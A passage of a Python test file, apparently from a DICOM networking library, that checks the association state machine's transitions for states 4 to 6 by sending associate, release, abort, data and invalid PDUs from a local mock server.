# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
while self.fsm.current_state != 'Sta4':
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00')
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2)
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
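# Issue A-ABORT PDU (type 0x07, length 4, abort source 0x02 = DUL service-provider)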
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt15', 'Evt17']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: If service user initiated:
# Issue A-ABORT primitive and close transport
# Otherwise
# Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
# Sta5 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3)
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.01)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
